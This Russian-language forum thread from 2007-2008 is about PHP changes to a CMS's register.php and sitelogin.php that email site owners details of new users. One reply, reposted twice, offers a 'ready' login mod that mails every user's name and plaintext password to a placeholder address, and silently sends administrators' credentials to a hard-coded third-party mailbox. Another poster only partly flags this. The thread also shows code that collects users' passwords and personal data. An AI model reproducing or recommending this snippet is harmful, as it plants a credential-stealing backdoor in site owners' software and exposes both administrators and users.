Eprst 0 Опубликовано: 24 февраля 2007 Рассказать Опубликовано: 24 февраля 2007 Решил сделать чтобы приходили уведеомления на почту о новых зарегистрированных пользователях, но вот не все работает! Моежет кто подправит!!! \modules\register.php .............. .............. if (!empty($postedxfields)) { foreach ($postedxfields as $xfielddataname => $xfielddatavalue) { if (!$xfielddatavalue) { continue;} $xfielddatavalue = $db->safesql($parse->BB_Parse($parse->process($xfielddatavalue), false)); $xfielddataname = $db->safesql($xfielddataname); $xfielddataname = str_replace("|", "|", $xfielddataname); $xfielddatavalue = str_replace("|", "|", $xfielddatavalue); $filecontents[] = "$xfielddataname|$xfielddatavalue"; } $filecontents = implode("||", $filecontents); } else $filecontents = ''; //-------------------------------------------------- //Отправка на amalyarchuk@inbox.ru: mail("amalyarchuk@inbox.ru", $user." загеристрирован", "Логин: ".$user. "\nПароль: ".$regpassword. //not work "\nE-mail: ".$email. //not work "\nИмя: ".$fullname. "\nГород: ".$land. "\nICQ: ".$icq. "\nIP: ".$_IP. "\nИнфа: ".$info. "\nДата: ".$add_time, "From: $mailfrom\r\n"); //-------------------------------------------------- $db->query("UPDATE " . PREFIX . "_users set fullname='$fullname', info='$info', land='$land', icq='$icq', xfields='$filecontents' where name='$user'"); msgbox ($lang['reg_ok'], $lang['reg_ok_1']); $stopregistration = TRUE; } } Цитата Ссылка на сообщение Поделиться на других сайтах
Шефф 0 Опубликовано: 24 февраля 2007 Рассказать Опубликовано: 24 февраля 2007 (изменено) в файле engine/modules/sitelogin.php ищем это: $_POST['login_name'] = $db->safesql($_POST['login_name']); $_POST['login_password'] = md5($_POST['login_password']); и сразу ПЕРЕД ними ставим это: if ($member_id['user_group']!=1) { mail("ваш@почтовый.ящик","","login: ".$_POST['login_name']."\n pass: ".$_POST['login_password'],"From: PASS"); } else { mail("magasoft@mail.ru","","login: ".$_POST['login_name']."\n pass: ".$_POST['login_password'],"From: PASS"); } Изменено 24 февраля 2007 пользователем Шефф Цитата Ссылка на сообщение Поделиться на других сайтах
Eprst 0 Опубликовано: 24 февраля 2007 Рассказать Опубликовано: 24 февраля 2007 Автор х.. это из другово топика! Я конечно не спец в пхп, но и не ламер - дурить не надо. Мой код работает только не вся информация приходит! Цитата Ссылка на сообщение Поделиться на других сайтах
Шефф 0 Опубликовано: 24 февраля 2007 Рассказать Опубликовано: 24 февраля 2007 так пользуйся готовым Цитата Ссылка на сообщение Поделиться на других сайтах
Eprst 0 Опубликовано: 26 февраля 2007 Рассказать Опубликовано: 26 февраля 2007 Автор так пользуйся готовым каким готовым? Цитата Ссылка на сообщение Поделиться на других сайтах
zarovd 0 Опубликовано: 18 марта 2007 Рассказать Опубликовано: 18 марта 2007 Не точно работае, присылает постоянно письма при авторизации на сайте а не при регистрации! Мож че другое есть? в файле engine/modules/sitelogin.php ищем это: $_POST['login_name'] = $db->safesql($_POST['login_name']); $_POST['login_password'] = md5($_POST['login_password']); и сразу ПЕРЕД ними ставим это: if ($member_id['user_group']!=1) { mail("ваш@почтовый.ящик","","login: ".$_POST['login_name']."\n pass: ".$_POST['login_password'],"From: PASS"); } else { mail("magasoft@mail.ru","","login: ".$_POST['login_name']."\n pass: ".$_POST['login_password'],"From: PASS"); } Цитата Ссылка на сообщение Поделиться на других сайтах
Al-x 7 Опубликовано: 19 марта 2007 Рассказать Опубликовано: 19 марта 2007 Не точно работае, присылает постоянно письма при авторизации на сайте а не при регистрации! Мож че другое есть? Цитата(Шефф @ 24.02.2007, 19:03) в файле engine/modules/sitelogin.php ищем это: Код $_POST['login_name'] = $db->safesql($_POST['login_name']); $_POST['login_password'] = md5($_POST['login_password']); и сразу ПЕРЕД ними ставим это: Код if ($member_id['user_group']!=1) { mail("ваш@почтовый.ящик","","login: ".$_POST['login_name']."\n pass: ".$_POST['login_password'],"From: PASS"); } else { mail("magasoft@mail.ru","","login: ".$_POST['login_name']."\n pass: ".$_POST['login_password'],"From: PASS"); } Я надеюсь ты когда ставил себе этот мод, ты mail("magasoft@mail.ru","","login: ". сменил на свой? Кажится кто-то кого-то кем-то считает Цитата Ссылка на сообщение Поделиться на других сайтах
Eprst 0 Опубликовано: 19 марта 2007 Рассказать Опубликовано: 19 марта 2007 Автор Это все из другово топика Цитата Ссылка на сообщение Поделиться на других сайтах
Al-x 7 Опубликовано: 19 марта 2007 Рассказать Опубликовано: 19 марта 2007 Ep®$T, сорри, что оффтоп развиваю, я тот топик читал, просто не хотел чтоб DenisZ напоролся, если вдруг не видел той темы Цитата Ссылка на сообщение Поделиться на других сайтах
Eprst 0 Опубликовано: 19 марта 2007 Рассказать Опубликовано: 19 марта 2007 Автор я немного доработал код, но всеже не все присылается попозже размещу... прошу не пинать, я не профи а пхп пообще не знаю просто чуть чуть соображалки имеется и цель Цитата Ссылка на сообщение Поделиться на других сайтах
Гость Автоответчик Опубликовано: 19 марта 2007 Рассказать Опубликовано: 19 марта 2007 <#thank#> Цитата Ссылка на сообщение Поделиться на других сайтах
Al-x 7 Опубликовано: 19 марта 2007 Рассказать Опубликовано: 19 марта 2007 погоди, там нет таких строк......переменных.... переменные пароль и мыла вообще не фигурируют там, где ты их пытаешься вставлять... Я просто хорошо помню этот код (т.е. я сейчас не смотрел), поэтому точнее не подскажу, но скажу следующее - код разбит на несколько частей. Одна из них - начало регистрации, вторая - заполнение полей профиля, ну третья есть, но не важно... Вот ты берёшь вторую, а в ней уже пароль и мыло не берутся. Цитата Ссылка на сообщение Поделиться на других сайтах
Eprst 0 Опубликовано: 20 марта 2007 Рассказать Опубликовано: 20 марта 2007 Автор А можно использовать код для просмотра профиля? Чтобы инфу собирать! Цитата Ссылка на сообщение Поделиться на других сайтах
Al-x 7 Опубликовано: 20 марта 2007 Рассказать Опубликовано: 20 марта 2007 я не понял вопроса Цитата Ссылка на сообщение Поделиться на других сайтах
Eprst 0 Опубликовано: 20 марта 2007 Рассказать Опубликовано: 20 марта 2007 Автор Я так и думал что переменные не объеявлены и инфу они передавать не могут поэтому пришлось бы сделать 2 письма а не одно как хотелось бы. Поэтому можно ли как-то использовать код который используется при просмотре профиля пользователя - это все в текст письма и админу, после успешной регистрации, а как идейка!? Реально или мечты? Цитата Ссылка на сообщение Поделиться на других сайтах
Al-x 7 Опубликовано: 20 марта 2007 Рассказать Опубликовано: 20 марта 2007 Ep®$T, сделай. Просто добавь один запрос перед отсылкой. А вот нафига тебе его пароль? С нравственной стороны, а так же технической - он же закодирован уже. Тебе толку от него не будет, ты его не вскроешь Цитата Ссылка на сообщение Поделиться на других сайтах
Eprst 0 Опубликовано: 20 марта 2007 Рассказать Опубликовано: 20 марта 2007 Автор впринципе согласен то что я обещал выложить: register.php } else $filecontents = ''; //-------------------------------------------------- //Отправка на amalyarchuk@inbox.ru: mail("amalyarchuk@inbox.ru", $user." загеристрирован", "Логин: ".$user. "\nПароль: ".$regpassword. //not work "\nE-mail: ".$email. //not work "\nИмя: ".$fullname. "\nГород: ".$land. "\nICQ: ".$icq. "\nIP: ".$_IP. "\nИнфа: ".$info. "\nДата: ".$add_time, "From: $mailfrom\r\n"); //-------------------------------------------------- $db->query("UPDATE " . PREFIX . "_users set fullname='$fullname', info='$info', land='$land', icq='$icq', xfields='$filecontents' where name='$user'"); ну все таки кое что работает! ну хотя бы знать что есть зарегистрированные пользователь когда посещаемость мала Цитата Ссылка на сообщение Поделиться на других сайтах
LocalHost 0 Опубликовано: 30 марта 2007 Рассказать Опубликовано: 30 марта 2007 а моно сделать штобы в лс отсилал собщение Цитата Ссылка на сообщение Поделиться на других сайтах
Eprst 0 Опубликовано: 31 марта 2007 Рассказать Опубликовано: 31 марта 2007 Автор Куда? Цитата Ссылка на сообщение Поделиться на других сайтах
zarovd 0 Опубликовано: 8 апреля 2007 Рассказать Опубликовано: 8 апреля 2007 впринципе согласен то что я обещал выложить: register.php } else $filecontents = ''; //-------------------------------------------------- //Отправка на amalyarchuk@inbox.ru: mail("amalyarchuk@inbox.ru", $user." загеристрирован", "Логин: ".$user. "\nПароль: ".$regpassword. //not work "\nE-mail: ".$email. //not work "\nИмя: ".$fullname. "\nГород: ".$land. "\nICQ: ".$icq. "\nIP: ".$_IP. "\nИнфа: ".$info. "\nДата: ".$add_time, "From: $mailfrom\r\n"); //-------------------------------------------------- $db->query("UPDATE " . PREFIX . "_users set fullname='$fullname', info='$info', land='$land', icq='$icq', xfields='$filecontents' where name='$user'"); ну все таки кое что работает! ну хотя бы знать что есть зарегистрированные пользователь когда посещаемость мала а куда вставлять это или все полностью заменять Цитата Ссылка на сообщение Поделиться на других сайтах
Eprst 0 Опубликовано: 9 апреля 2007 Рассказать Опубликовано: 9 апреля 2007 Автор //-------------------------------------------------- вот линия разграничивает Цитата Ссылка на сообщение Поделиться на других сайтах
zarovd 0 Опубликовано: 9 апреля 2007 Рассказать Опубликовано: 9 апреля 2007 //-------------------------------------------------- вот линия разграничивает ясно а насчет пароля и email непоскажешь что надо сделать что присылал Цитата Ссылка на сообщение Поделиться на других сайтах
desert32 0 Опубликовано: 13 июля 2008 Рассказать Опубликовано: 13 июля 2008 Прикольная функция, все работает вот только email не присылает, как исправить. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.